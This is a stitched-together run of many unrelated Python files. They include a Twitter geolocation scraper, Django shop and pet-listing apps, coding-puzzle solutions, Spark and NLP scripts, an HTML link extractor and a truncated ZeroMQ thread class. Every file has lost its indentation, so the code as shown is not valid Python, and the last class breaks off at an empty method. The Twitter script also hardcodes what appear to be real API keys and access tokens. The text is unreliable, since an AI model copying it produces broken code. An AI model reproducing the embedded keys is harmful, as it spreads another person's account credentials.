print 'Add an Actor'
# Clear the string, so we can get it
game.core.input.ClearAutoString()
# Create UI Popup information, to create a popup input display
game.ui_popup_data = {'action':'add actor', 'prompt':'Enter Name:', 'name':None}
# Start and Stop playing
if self.input.IsKeyDown(K_SPACE, once=True):
game.playing = not game.playing
# Reset time, so we dont jump ahead
game.time_previous = time.time()
game.time_current = time.time()
# If they hit ESC
if self.input.IsKeyDown(K_ESCAPE, once=True):
# Save the Screenplay before we quit
#TODO(g): Check if it changed, make a ".lastquit" version of it, and load that. Allow loading of
# previous versions and do versioning in a backup directory. Not a lot of data, worth having
# continuous Undo log of saved states...
owr_screenplay.SaveScreenplay(game)
# Save the UI state, so we can resume editing in the same place we left off on restart
owr_screenplay.SaveUIState(game)
game.quitting = True
|
# coding: utf-8
import torch
import torch_interpolations
import numpy as np
import matplotlib.pyplot as plt
points = [torch.arange(-.5, 2.5, .2) * 1., torch.arange(-.5, 2.5, .2) * 1.]
values = torch.sin(points[0])[:, None] + 2 * torch.cos(points[1])[None, :] + torch.sin(5 * points[0][:, None] @ points[1][None, :])
gi = torch_interpolations.RegularGridInterpolator(points, values)
X, Y = np.meshgrid(np.arange(-.5, 2.5, .02), np.arange(-.5, 2.5, .01))
points_to_interp = [torch.from_numpy(
X.flatten()).float(), torch.from_numpy(Y.flatten()).float()]
fx = gi(points_to_interp)
print(fx)
fig, axes = plt.subplots(1, 2)
axes[0].imshow(np.sin(X) + 2 * np.cos(Y) + np.sin(5 * X * Y))
axes[0].set_title("True")
axes[1].imshow(fx.numpy().reshape(X.shape))
axes[1].set_title("Interpolated")
plt.show() |
# Created by @RGuitar96 using @sethoscope heatmap and Tweepy library for the Twitter API
# Dependencies:
# pip install tweepy
# pip install textblob
import json
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
ckey = 'HS38Z8lPuAiaOcogMVybFBtzR'
csecret = 'fqNEDpXxoIoWUY4e7vDf3F3SYhm8qFNmqZiZOL5W77enWBcc1v'
atoken = '540079107-a6HSC1Ipm9LhagMSTiQyDpoEQjuq8ZG420dOUMC5'
asecret = 'zd1T13XKQ7DhVuEqBx540Y1SGnbkfu0NHdiWC1L16NOHY'
# First pair (longitude, latitude) indicates the lower left or southwest corner
# Second pair indicates the upper right or northeast corner
# alcalá de henares
# region = [-3.406054, 40.462477, -3.335267, 40.521660]
# comunidad de madrid
region = [-4.650673, 39.859128, -2.943299, 41.226270]
class listener(StreamListener):
def on_data(self, data):
# Data returned in JSON
try:
decoded = json.loads(data)
except Exception as e:
print(e)
return True
file = open('tweets.txt', 'a')
file_coordinates = open('tweets_coordinates.txt', 'a')
location = decoded['place']['bounding_box']['coordinates']
if (location) is not None:
lat = 0
lon = 0
for x in range(0, len(location[0])):
lon = lon + location[0][x][0]
lat = lat + location[0][x][1]
lon = lon/len(location[0])
lat = lat/len(location[0])
location = [lat,lon]
coord = '%s %s\n' % (lat,lon)
else:
location = '[,]'
if (lat>region[1] and lat<region[3] and lon>region[0] and lon<region[2]):
text = decoded['text'].replace('\n',' ').encode('utf-8')
user = '@' + decoded.get('user').get('screen_name')
created = decoded.get('created_at')
tweet = '%s|%s|%s|%s\n' % (user,location,created,text)
file.write(tweet)
file.close()
file_coordinates.write(coord)
file_coordinates.close()
return True
def on_error(self, status):
print(status)
if __name__ == '__main__':
print('Stream has began...')
auth = OAuthHandler(ckey, csecret)
auth.set_access_token(atoken, asecret)
twitterStream = Stream(auth, listener())
twitterStream.filter(locations=region)
# When you are done capturing tweets, you can generate a heatmap
# as shown below. You can adjust the parameters as you prefer.
#
# python heatmap.py -o output.png --osm -W 2000
# -v -e 39.8591,-4.6506,41.2262,-2.9432
# -d 0.6 -r 60 http://b.tile.stamen.com/toner tweets_coordinates.txt
|
from django.shortcuts import render, redirect
from django.views.generic import CreateView
from django.urls.base import reverse_lazy
from django.contrib.messages import success, error
# Create your views here.
from account.models import Customer
from .models import OrderItem, Order
from .forms import CheckoutForm
from .signals import send_form
# def deletefromcart(request, id):
# cartitem = OrderItem.objects.get(id=id)
# cartitem.delete()
# return redirect('cart')
def cart(request):
show_order_items = None
# device = request.COOKIES['device']
device = request.COOKIES.get('device')
customer, created = Customer.objects.get_or_create(device=device)
print('customer', customer)
order, created = Order.objects.get_or_create(customer=customer, complete=False)
print('order', order)
items = order.orderitem_set.all()
print('items:', order.orderitem_set.all())
imgs = {}
print("orderin folsudumu", order.complete)
if not order.complete:
show_order_items = True
for item in items:
print('cart-item:', item)
print('cart-item.product:', item.product)
imgs.update({item.id: item.product.images.get(is_main=True).imageURL})
print('order', order)
print('imgs', imgs)
print('orderitemler:', order.orderitem_set.all())
else:
order = None
print("order: bu", show_order_items)
# print("Carta girende imgs: ", imgs[item.id].first())
context = { 'show_order_items': show_order_items, 'order':order, 'imgs': imgs}
return render(request, 'cart.html', context)
def checkout(request):
device = request.COOKIES.get('device')
customer, created = Customer.objects.get_or_create(device=device)
order, created = Order.objects.get_or_create(customer=customer, complete=False)
items = order.orderitem_set.all()
total=0
for item in items:
total += item.get_total
context = {'items': items, 'form': CheckoutForm, 'total':total, 'order': order}
# {{order.get_discount_total|floatformat:2}}
if request.method == 'POST':
form = CheckoutForm(request.POST, instance=order)
if form.is_valid():
form.save(commit=False)
order.complete = True
form.save()
send_form(instance=order)
success(request, 'Sifarisiniz qeydə alınmışdır gün ərzində sizinlə əlaqə saxlanılılacaq.')
return redirect('index:home')
return render(request, 'checkout.html', context)
|
import json
new_data = []
# Loading or Opening the json file
with open('universities.json') as sfile:
file_data = json.load(sfile)
for item in file_data:
# print(item)
new_item = {}
new_item["name"] = item.get("name")
new_item["website"] = item.get("web_pages")[0]
print(new_item)
new_data.append(new_item)
json_object = json.dumps(new_data, indent=4)
# Writing to sample.json
with open("universities_formatted.json", "w") as outfile:
outfile.write(json_object)
|
import numpy as np
class SFT(object):
def __init__(self, sigma=0.1):
self.sigma = sigma
def __call__(self, emb_org):
emb_org_norm = np.linalg.norm(emb_org, 2, 1).reshape((-1, 1)).clip(min=1e-12)
emb_org_norm = emb_org / emb_org_norm
W = np.matmul(emb_org_norm, emb_org_norm.T)
W = W / float(self.sigma)
W_exp = np.exp(W - np.max(W, axis=1))
T = W_exp / np.sum(W_exp, axis=1).reshape((-1, 1))
emb_sft = np.matmul(T, emb_org)
return emb_sft
import pickle
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
from Domain.BodyCollection import BodyCollection
import os
def get_embeddings(file) -> BodyCollection:
with open(file, 'rb') as f:
data = pickle.load(f)
return data
def TSNE_plot(data, classes, title):
X_embedded = TSNE(n_components=2).fit_transform(data)
plt.scatter(X_embedded[:,0], X_embedded[:,1], c = classes)
plt.title(title)
plt.show()
def saveBodyInformation(file: str, collection) -> None:
with open(file, 'wb') as output:
pickle.dump(collection, output, pickle.HIGHEST_PROTOCOL)
if __name__ == '__main__':
sft_np_op = SFT(sigma=0.05)
ps = "../data/TCG_alignedReId/ParqueSur.pkl"
ay = "../data/TCG_alignedReId/Ayagaures.pkl"
bc = get_embeddings(ps)
emb,cls = bc.get_dataset()
sft = sft_np_op(emb)
print(cls)
TSNE_plot(sft, cls, 'PS')
bc.set_embeddings(sft)
#saveBodyInformation(ps, bc)
bc = get_embeddings(ay)
emb,cls = bc.get_dataset()
sft = sft_np_op(emb)
TSNE_plot(sft, cls, 'AY')
bc.set_embeddings(sft)
#saveBodyInformation(ay, bc) |
import os
from pyspark.sql import SparkSession
from pyspark.sql.functions import col, desc
if __name__ == "__main__":
spark = SparkSession.builder.appName("SparkSQLExampleApp").getOrCreate()
csv_file = f"{os.path.dirname(os.path.realpath(__file__))}/data/departuredelays.csv"
df = (
spark.read.format("csv")
.option("inferSchema", "true")
.option("header", "true")
.load(csv_file)
)
# Assign name for table in spark sql
df.createOrReplaceTempView("us_delay_flights_tbl")
spark.sql(
"""SELECT distance, origin, destination FROM us_delay_flights_tbl
WHERE distance > 1000 ORDER BY distance DESC"""
).show(10)
spark.sql(
"""SELECT date, delay, origin, destination
FROM us_delay_flights_tbl
WHERE delay > 120 AND ORIGIN = 'SFO' AND DESTINATION = 'ORD'
ORDER BY delay DESC"""
).show(10)
(
df.select("distance", "origin", "destination")
.where(col("distance") > 1000)
.orderBy(desc("distance"))
).show(10)
|
from django import forms
# forms go here
class birthdayEmailForm(forms.Form):
message = forms.CharField(widget=forms.Textarea, max_length=1000)
|
"""
Solution 1:
keep a stack, which is allways increasing.
each time it comes to a lower number x, compute area based on now idx and count, set all bigger int to x and push them back to stack s
Solution 2:
dp solution
keep a most left and most right dp array to keep the left and right bound for each point
trick point:
we cannot compare each point with all its left or right points.
We iteratively choose current point that need to compare. Each time cur pointer is point to a smaller number.
E.g. for left case:
cur = i - 1
while cur >= 0 and heights[cur] > heights[i]:
left[i] = left[cur]
cur = left[cur] - 1
"""
class Solution:
def largestRectangleArea(self, heights):
"""
:type heights: List[int]
:rtype: int
"""
if not heights:
return 0
stack = [0]
heights.append(0)
print(heights)
max_area = 0
for i in range(len(heights)):
print(stack)
if heights[i] >= stack[-1]:
stack.append(heights[i])
else:
k = len(stack) - 1
count = 0
while heights[i] < stack[k] and k >= 0:
count += 1
# print(count)
# print(stack[k])
area = count * stack[k]
if max_area < area:
max_area = area
k -= 1
# print(max_area)
stack = stack[:-count] + [heights[i],] * (count + 1)
# print((count + 1) * stack[k])
# if max_area < (count + 1) * heights[i]:
# max_area = (count + 1) * heights[i]
return max_area
def largestRectangleArea_dp(self, heights):
n = len(heights)
if n == 0:
return 0
left = [i for i in range(n)]
right = [i+1 for i in range(n)]
print(heights)
for i in range(1, n):
# indicates the next value to compare
cur = i - 1
while cur >= 0 and heights[cur] > heights[i]:
left[i] = left[cur]
cur = left[cur] - 1
for j in range(n-1, -1, -1):
cur = j + 1
while cur < n and heights[cur] > heights[j]:
right[j] = right[cur]
cur = right[cur]
print(left)
print(right)
max_val = 0
for i in range(n):
tmp = heights[i] * (right[i] - left[i])
if max_val < tmp:
max_val = tmp
return max_val
s = Solution()
print(s.largestRectangleArea_dp([2,1,5,6,2,3])) |
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 08 11:16:09 2016
@author: David
astro598algorithms lecture, file myprogram.py
"""
import mymath
a = mymath.Complex(1.0,2.0)
b = mymath.Complex(3.0,4.0)
c = mymath.Complex.add(a,b)
print c.real
print c.imag |
class Solution:
def cnt(self, s):
if len(s) == 1:
if (s == "*"):
return 9
elif (s == "0"):
return 0
else:
return 1
elif len(s) == 2:
if (s[0] == "0"):
return 0
if (s[0] == "1"):
if (s[1] == "*"):
return 9
else:
return 1
if (s[0] == "*"):
if (s[1] == "*"):
return 15 # Careful here. * can only represent 1-9, not 0
else:
if (int(s[1]) <= 6):
return 2
else:
return 1
if (s[0] == "2"):
if s[1] == "*":
return 6
else:
if (int(s[1]) > 6):
return 0
else:
return 1
else:
return 0
else:
return 0
def numDecodings(self, s):
"""
:type s: str
:rtype: int
"""
# N[i] - number of ways to decode s[:i]
# N[i+1] = N[i] * cnt(s[i]) + N[i-1] * cnt(s[i-1:i+1])
# Base case - N[1], N[2]
if (len(s) == 0):
return 0
elif len(s) == 1:
return self.cnt(s[0])
N = [0] * (len(s) + 1)
N[0] = 1
N[1] = self.cnt(s[0])
for i in range(1, len(s)):
N[i+1] = (N[i] * self.cnt(s[i]) + N[i-1] * self.cnt(s[i-1:i+1])) % (10**9 + 7)
return N[len(s)]
|
from django.forms import ModelForm, inlineformset_factory
from .models import BillHeader, BillLines
class BillHeaderForm(ModelForm):
class Meta:
model = BillHeader
fields = ['company_name', 'street_address', 'city', 'state', 'phone', 'email']
BillLineFormSet = inlineformset_factory(BillHeader, BillLines, fields = ('description', 'quantity', 'unit_price')) |
from django.conf.urls.defaults import patterns, url
urlpatterns = patterns('shopapp.jingdong.views',
url(r'login/$', 'loginJD', name='login_jd'),
url(r'login/auth/$', 'loginAuthJD', name='login_auth_jd'),
) |
import csv
def nameParser(s):
res = "";
addSpace = False;
for char in s:
if char.isalpha():
addSpace = True;
res += char;
elif addSpace and char != '\'':
res += ' '
addSpace = False;
return res;
writer = open("schoolByYear.csv", "w");
ratios = {};
salary = {};
schools = [];
with open('timesData.csv') as dFile:
reader = csv.reader(dFile, delimiter=',')
for row in reader:
processedName = nameParser(row[1]);
try:
ratios[processedName] = float(row[10]);
except :
continue;
with open('merged_school_data.csv') as schoolFile:
reader = csv.reader(schoolFile, delimiter=',')
for row in reader:
try:
name = nameParser(row[0]);
if name in ratios:
print(ratios[name]);
ratio = float(ratios[name]);
rank = row[6];
tuition = row[12];
control = row[16];
patent = row[17];
score = row[18];
year = row[19];
schools.append({"name":name, "rank":rank, "score":score,
"control":control, "tuition": tuition,
"patent":patent, "year":year, "ratio":ratio});
except:
continue;
# for school in info:
# school["coordinate"] = zips[str(int(school["zip"]))]
writer.write("name,rank,score,control,tuition,patent,year,ratio\n")
for school in schools:
writer.write(school["name"]+","+str(school["rank"])+","+str(school["score"])+","
+school["control"]+","+str(school["tuition"])+","+str(school["patent"])+","
+str(school["year"])+","+str(school["ratio"])+"\n");
writer.close()
|
from fastapi import FastAPI
from fastapi.middleware.gzip import GZipMiddleware
from fastapi.openapi.utils import get_openapi
from loguru import logger
from app.api.v1.api import api_router
from app.core import settings
from app.core.events import create_start_app_handler, create_stop_app_handler
from app.views import view_router
def create_app(add_event_handlers: bool = True) -> FastAPI:
logger.add(
settings.LOG_FILE, level=settings.LOG_LEVEL, backtrace=settings.LOG_BACKTRACE
)
app = FastAPI(
debug=settings.DEBUG,
title=settings.PROJECT_NAME,
)
# add middleware
app.add_middleware(GZipMiddleware, minimum_size=1000)
if add_event_handlers:
# add event handlers
app.add_event_handler("startup", create_start_app_handler(app))
app.add_event_handler("shutdown", create_stop_app_handler(app))
# add routes
app.include_router(api_router, prefix="/api/v1")
app.include_router(view_router)
openapi_schema = get_openapi(
title=settings.PROJECT_NAME,
version=settings.VERSION,
description=settings.DESCRIPTION,
routes=app.routes,
)
app.openapi_schema = openapi_schema
return app
app = create_app()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 4 15:10:32 2018
@author: home
"""
# while val in nums:
# nums.remove(val)
# res = len(nums)
# return res
#def solution(nums, val):
# nums = list(filter(lambda x: x != val, nums))
# res = len(nums)
#
# return res
def solution(nums, val):
nums = [e for e in nums if e != val]
print(nums)
res = len(nums)
return res
if __name__ == "__main__":
nums = [3, 2, 2, 3]
val = 3
i = 0
while i < solution(nums, val):
print(nums[i])
i += 1
|
from django.db import models
from accounts.models import User
# Create your models here.
class Animal(models.Model):
kind = models.CharField(max_length=100)
class Species(models.Model):
species = models.CharField(max_length=100)
animal = models.ForeignKey(Animal, on_delete=models.CASCADE, related_name="species")
class City(models.Model):
city = models.CharField(max_length=100)
class Borough(models.Model):
gu = models.CharField(max_length=100)
city = models.ForeignKey(City, on_delete=models.CASCADE, related_name="borough")
gender_choice = (('Male', 'Male'), ('Female', 'Female'), ('Unknown', 'Unknown'))
class Article(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="articles_lost")
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
title = models.CharField(max_length=100)
name = models.CharField(max_length=100)
content = models.TextField()
gender = models.CharField(max_length=100, choices=gender_choice)
chip = models.BooleanField()
age = models.CharField(max_length=100)
city = models.ForeignKey(City, on_delete=models.CASCADE, related_name="articles_lost")
borough = models.ForeignKey(Borough, on_delete=models.CASCADE, related_name="articles_lost")
animal = models.ForeignKey(Animal, on_delete=models.CASCADE, related_name="articles_lost")
species = models.ForeignKey(Species, on_delete=models.CASCADE, related_name="articles_lost")
time = models.CharField(max_length=100)
image_url = models.TextField()
class Comment(models.Model):
content = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="comments_lost")
article = models.ForeignKey(Article, on_delete=models.CASCADE, related_name="comments_lost")
|
from __future__ import unicode_literals
import pickle
import pandas as pd
import numpy as np
from nltk.tokenize import word_tokenize
from nltk import pos_tag
from nltk.corpus import stopwords as stpwrd
from nltk.stem import WordNetLemmatizer
from sklearn.preprocessing import LabelEncoder
from sklearn import model_selection
from collections import defaultdict
from nltk.corpus import wordnet as wn
from sklearn.feature_extraction.text import TfidfVectorizer
from PersianStemmer import PersianStemmer
from hazm import *
from os.path import dirname, abspath ,join
import pickle
import random
d = dirname(dirname(dirname(abspath(__file__)))) #set files directory path
#print(Test_X_Tfidf.shape)
#print(Tfidf_vect.vocabulary_)
#adding persian stopwords to nltk stopwords list:
stopwords = stpwrd.words('english')
persian = open(join(d,"stopwordlists","persian"),encoding="utf-8").read().splitlines()
nonverbal = open(join(d,"stopwordlists","nonverbal"),encoding="utf-8").read().splitlines()
short = open(join(d,"stopwordlists","short"),encoding="utf-8").read().splitlines()
verbal = open(join(d,"stopwordlists","verbal"),encoding="utf-8").read().splitlines()
chars = open(join(d,"stopwordlists","chars"),encoding="utf-8").read().splitlines()
stopwords.extend(persian)
stopwords.extend(nonverbal)
stopwords.extend(short)
stopwords.extend(verbal)
stopwords.extend(chars)
ps = PersianStemmer()
np.random.seed(500)
def preprocess(dataset="preprocessed_data_set.csv", test_data_percent=0.25):
'''
####################################################################
#########################PREPROCESS SECTION#########################
####################################################################
'''
#Step by Step Tasks to prepare dataset for learning:
#Reading the dataset
Corpus = pd.read_csv(join(d,"files",dataset),encoding='utf-8')
#Remove blank rows if any.
Corpus['text'].dropna(inplace=True)
#Change all the text to lower case.
Corpus['text'] = [entry.lower() for entry in Corpus['text']]
#Normalize persian sentences
normalizer = Normalizer()
Corpus['text'] = [normalizer.normalize(entry) for entry in Corpus['text']]
#for entry in Corpus['text']:
# print(entry)
#Tokenization : In this each entry in the corpus will be broken into set of words
Corpus['text']= [word_tokenize(entry) for entry in Corpus['text']]
#Remove Stop words, Non-Numeric and perfom Word Stemming/Lemmenting.
#Persian words Stemming
for entry in Corpus['text']:
for token in entry:
token=ps.run(token)
#WordNetLemmatizer tagging
tag_map = defaultdict(lambda : wn.NOUN)
tag_map['J'] = wn.ADJ
tag_map['V'] = wn.VERB
tag_map['R'] = wn.ADV
for index,entry in enumerate(Corpus['text']):
Final_words = [] #output list
#Enlgish words lemmenting
word_Lemmatized = WordNetLemmatizer() # Initializing WordNetLemmatizer()
#pos_tag function below will provide the 'tag' i.e if the word is Noun(N) or Verb(V) or something else.
for word, tag in pos_tag(entry):
#check for Stop words and consider only alphabets
if word not in stopwords and word.isalpha():
word_Final = word_Lemmatized.lemmatize(word,tag_map[tag[0]])
Final_words.append(word_Final)
#The final processed set of words for each iteration will be stored in 'text_final'
Corpus.loc[index,'text_final'] = str(Final_words)
#Prepare train and test set for learning
Train_X, Test_X, Train_Y, Test_Y = model_selection.train_test_split(Corpus['text_final'],
Corpus['label'],test_size=test_data_percent)
#encoding labels to numbers
Encoder = LabelEncoder()
Train_Y = Encoder.fit_transform(Train_Y)
Test_Y = Encoder.fit_transform(Test_Y)
#Apply TFIDF method for vectorizing words
Tfidf_vect = TfidfVectorizer(max_features=10000)
Tfidf_vect.fit(Corpus['text_final'])
Train_X_Tfidf = Tfidf_vect.transform(Train_X)
Test_X_Tfidf = Tfidf_vect.transform(Test_X)
#save tfidf vectorizer
with open(join(d,"trained_models","tfidf_vectorizer_vocab.pkl"), 'wb') as filevec:
pickle.dump(Tfidf_vect.vocabulary_, filevec)
return Train_X_Tfidf, Train_Y , Test_X_Tfidf , Test_Y
def preprocess_input(input_str,transformer_in,vec_in):
#load vectorizer:
transformer = transformer_in
loaded_vec = vec_in
ps = PersianStemmer()
#Step by Step Tasks to prepare dataset for learning
#Reading the dataset
Corpus = pd.read_csv(join(d,"files",'input_queries_dataset.csv'),encoding='utf-8')
#Remove blank rows if any.
Corpus['text'].dropna(inplace=True)
#Change all the text to lower case.
Corpus['text'] = [entry.lower() for entry in Corpus['text']]
#Normalize persian sentences
normalizer = Normalizer()
Corpus['text'] = [normalizer.normalize(entry) for entry in Corpus['text']]
#Tokenization : In this each entry in the corpus will be broken into set of words
Corpus['text']= [word_tokenize(entry) for entry in Corpus['text']]
#Remove Stop words, Non-Numeric and perfom Word Stemming/Lemmenting.
#Persian words Stemming
for entry in Corpus['text']:
for token in entry:
token=ps.run(token)
#WordNetLemmatizer tagging
tag_map = defaultdict(lambda : wn.NOUN)
tag_map['J'] = wn.ADJ
tag_map['V'] = wn.VERB
tag_map['R'] = wn.ADV
for index,entry in enumerate(Corpus['text']):
Final_words = [] #output list
#Enlgish words lemmenting
word_Lemmatized = WordNetLemmatizer() # Initializing WordNetLemmatizer()
#pos_tag function below will provide the 'tag' i.e if the word is Noun(N) or Verb(V) or something else.
for word, tag in pos_tag(entry):
#check for Stop words and consider only alphabets
if word not in stopwords and word.isalpha():
word_Final = word_Lemmatized.lemmatize(word,tag_map[tag[0]])
Final_words.append(word_Final)
#The final processed set of words for each iteration will be stored in 'text_final'
Corpus.loc[index,'text_final'] = str(Final_words)
#Prepare train and test set for learning
line=Corpus['text_final']
#print(line)
#Apply TFIDF method for vectorizing words
line_Tfidf = transformer.fit_transform(loaded_vec.fit_transform(line))
return line_Tfidf
|
#!/usr/bin/env python
# encoding: utf-8
class read(object) :
def __init__(self,num) :
self.num = int(num)
self.sumup = 0
def sum_up(self) :
number = self.num
while int(number) :
self.sumup += number % 10
number //= 10
print ("%d的各位数总和是%d" % (self.num,self.sumup) )
def print_out(self) :
num_list = [ 'yi','er','san','si','wu','liu','qi','ba','jiu']
sumup = int(self.sumup)
res = []
while int(sumup) :
index = int((sumup % 10) - 1)
res.append(num_list[index])
sumup //= 10
res.reverse()
out = ' '.join(res)
print ("%d的拼音是%s" % ( self.sumup,out))
def change(self) :
tmp = 7
res = []
sumup = self.sumup
while int(sumup) :
res.append(str(int(sumup) % tmp))
sumup //= tmp
res.reverse()
out = ''.join(res)
print ("%d转化为7进制是%s" % (self.sumup, out))
if __name__ == '__main__' :
number = read(input("输入一个尽可能长的数字\n"))
number.sum_up()
number.print_out()
number.change()
|
def multiple3or5(n):
if n % 3 == 0 or n % 5 == 0:
return True
else:
return False
sum = 0
for i in range(1,1000):
print ("checking", i)
if multiple3or5(i):
#print ("multiply ist im Ordnung", i)
sum = sum + i
#print ('sum is', sum)
print (sum)
|
__author__ = 'timothyahong'
class BaseVolumeEstimator():
pass
class SimpleVolumeEstimator(BaseVolumeEstimator):
def estimate(self, cap_values):
return [
self._determine_volume(cap_value_row) for cap_value_row in zip(*cap_values)
]
def _determine_volume(self, cap_value_row):
volume = 0
for value in cap_value_row:
#simple linear mat up to 100ml
if value < 10:
volume += 100*(float(value)/10)
else:
volume += 100
return int(volume) |
# Enter your code here. Read input from STDIN. Print output to STDOUT
i, m = input(), set(map(int, input().split()))
i, n = input(), set(map(int, input().split()))
diff = sorted(m.symmetric_difference(n))
print(*diff, sep ='\n')
|
from .rangerlars import RangerLars
optimizer = RangerLars(model.parameters(),
lr=lr,
weight_decay=weight_decay,
betas=(adam_beta1, adam_beta2),
)
|
import datetime
import os
from mongoengine import *
from course.models import Course
from user.models import Teacher
# Create your models here.
"""
资源实体类
"""
class Resource(Document):
id = SequenceField(primary_key=True) # 自增id
name = StringField(max_length=100,default='资源标题')
type = StringField(max_length=20,default='file',verbose_name='文件类型')
upload_time = StringField(max_length=50, verbose_name='上传日期',
default=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
owner = ReferenceField(Teacher) # 上传资源的教师
size = StringField(max_length=20,verbose_name='文件大小') # KB/MB
path = StringField(max_length=100,verbose_name='文件路径',null=False)
download_count = IntField(default=0,verbose_name='下载次数')
course = ReferenceField(Course) # 资源对应的课程
meta = {'collection': 'resource'} # 数据库中的集合
@staticmethod
def save_resource(file, course, owner):
"""
资源信息写入数据库
:param file: 文件
:param course: 课程
:param owner: 上传者(教师)
:return:
"""
file_type = os.path.splitext(file.name)[1][1:] # 获取文件后缀名 ppt/pdf
# 文件大小单位转换
if int(file.size / 1024) < 1024:
file_size = str(round(file.size / 1024, 2)) + 'KB'
else:
file_size = str(round(file.size / 1024 / 1024, 2)) + 'MB'
file_path = os.path.join(course.name, file.name) # 文件的相对地址
resource = Resource.objects.filter(path=file_path).first()
if not resource:
resource = Resource(name=file.name, type=file_type, size=file_size, owner=owner, path=file_path,
course=course)
resource.save()
else:
# 更新资源数据库记录
resource.download_count = 0
resource.size = file_size
resource.upload_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
resource.save()
|
# python 3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 6 10:49:31 2019
@author: Prachi Singh
"""
import sys,os
import copy
import numpy as np
from scipy import misc
from scipy import ndimage
import matplotlib.pyplot as plt
from scipy.interpolate import UnivariateSpline
from scipy.optimize import curve_fit
import imageio
import numpy as np
import pandas as pd
from pylab import *
from PIL import Image
# from scipy.misc import imsave
# import matplotlib.pyplot as plt
# from sklearn.linear_model import LinearRegression
import csv
# import seaborn as sn
# from sklearn.metrics import confusion_matrix
district = 'Surat'
folderName = district.lower()+'District'
fileExtn = '.tif'
def calculate_thresholds(district, cost_array):
threshold_1=1.95
return threshold_1
all_cities_actual = []
all_cities_predicted = []
labels = [1,2,3,4]
cities = ['Surat']
for district in cities:
print(district)
cost_array = np.loadtxt('./'+folderName+'/_conv_gaus_removed_16_24N_cost_array.txt')
cost_array = cost_array/1000
threshold1 = calculate_thresholds(district, cost_array)
string_threshold = "threshold 1:",threshold1
print(string_threshold)
band = imageio.imread('./'+folderName+'/'+district+'_prediction_temporal_'+str(2019)+fileExtn)
data = band/240
dims = band.shape
band1 = band
print (np.unique(data))
mask = np.sign(band)
k = np.array([[1,1,1],[1,1,1],[1,1,1]])
mask1 = ndimage.convolve(mask, k, mode='constant', cval=0.0)
iter=0
cbu = 0
cnbu = 0
changing = 0
for j in range(0, dims[0]):
for k in range(0, dims[1]):
if (mask1[j][k] == 9):
if (cost_array[iter]<=threshold1):
if data[j][k]==1:
band1[j][k] = 255
cnbu += 1
else:
band1[j][k] = 200
cbu += 1
else:
changing += 1
band1[j][k] = 100
iter += 1
else:
if(band1[j][k]!=0):
band1[j][k]=0
total = cnbu+cbu+changing
print((cnbu*100)/total, (cbu*100)/total, (changing*100)/total)
print(np.unique(band1))
imageio.imwrite('./'+folderName+'/'+district+'_prediction_temporal_mayank'+str(2019)+fileExtn, band1)
|
# Generated by Django 2.2.5 on 2019-11-11 11:20
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('usermanagement', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='patient',
name='created_date',
field=models.DateField(default=datetime.date(2019, 11, 11), null=True),
),
]
|
from .character_error_rate import character_error_rate
from .word_error_rate import word_error_rate
|
#!/usr/bin/env python
# XXX: clean up.
# XXX: relative links to root are wrongly handled.
# XXX: use option parser.
# XXX: add template stuff
'extract urls from an html page'
import htmllib
import HTMLParser as xhtmllib
import os
import re
import sys
import urllib
from formatter import NullFormatter
def getSearchParser(badhtml, imgs):
'get html parser'
if badhtml:
HTMLParser = htmllib.HTMLParser
else:
HTMLParser = xhtmllib.HTMLParser
class SearchParser(HTMLParser):
"Class for parsing a html page for links"
def __init__(self):
#super(SearchParser, self).__init__(self)
if badhtml:
HTMLParser.__init__(self, NullFormatter())
else:
HTMLParser.__init__(self)
self.urls = []
def handle_starttag(self, *args):
if badhtml:
HTMLParser.handle_starttag(self, *args)
tag, method, attrs = args
else:
tag, attrs = args
dattrs = dict(attrs)
if tag == 'a':
if 'href' in dattrs:
url = dattrs['href']
self.urls.append(url)
elif imgs and tag == 'img':
if 'src' in dattrs:
url = dattrs['src']
self.urls.append(url)
return SearchParser
def usage():
print "usage: %s url [baseurl]" % sys.argv[0]
print 'baseurl - the url to prefix relative links with'
def main():
'entry point'
if len(sys.argv) < 2:
usage()
sys.exit(1)
if '--img' in sys.argv:
imgs = True
sys.argv.remove('--img')
else:
imgs = False
if '--not-xhtml' in sys.argv:
# invalid xhtml
sys.argv.remove('--not-xhtml')
badhtml = True
else:
# valid XHTML
badhtml = False
url = sys.argv[1]
if '://' in url:
baseurl = url
else:
baseurl = ''
if len(sys.argv) >= 3:
baseurl = sys.argv[2]
searchres = urllib.urlopen(url)
htmldata = searchres.read()
searchres.close()
SearchParser = getSearchParser(badhtml, imgs)
parser = SearchParser()
parser.feed(htmldata)
for url in parser.urls:
if url.startswith('/') or not url.startswith('http'):
url = baseurl + url
print url
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
import threading
from collections import deque
import os
import zmq
import zhelpers
import zsync_utils
from zsync_network import Transceiver, Proxy
import config
import logging
import zlib
from zsync_logger import MYLOGGER, log_file_progress
class ZsyncThread(threading.Thread, Transceiver):
def __init__(self, ctx, remote_port, remote_sock,
inproc_sock, timeout, pipeline, chunksize, compress):
threading.Thread.__init__(self)
Transceiver.__init__(self)
self.ctx = ctx
self.timeout = timeout
self.pipeline = pipeline
self.chunksize = chunksize
self.compress = compress
self.remote_port = remote_port
self.remote_sock = remote_sock
self.remote = Proxy(self, remote_sock)
self.inproc_sock = inproc_sock
self.identity = str(self.inproc_sock.getsockopt_string(zmq.IDENTITY))
self.inproc = Proxy(self, inproc_sock)
self.stoped = False
self.file = zsync_utils.CommonFile()
self.register()
self.add_timeout(self.remote_sock, self.timeout)
return
def register(self):
Transceiver.register(self, self.remote_sock)
Transceiver.register(self, self.inproc_sock)
return
def do_stop(self, inproc, msg=''):
if msg:
MYLOGGER.debug(msg)
self.stop()
return
def stop(self):
self.stoped = True
def log(self, msg, level=logging.INFO):
self.inproc.on_child_log('thread %s: %s' % (self.identity, msg), level)
return
def run(self):
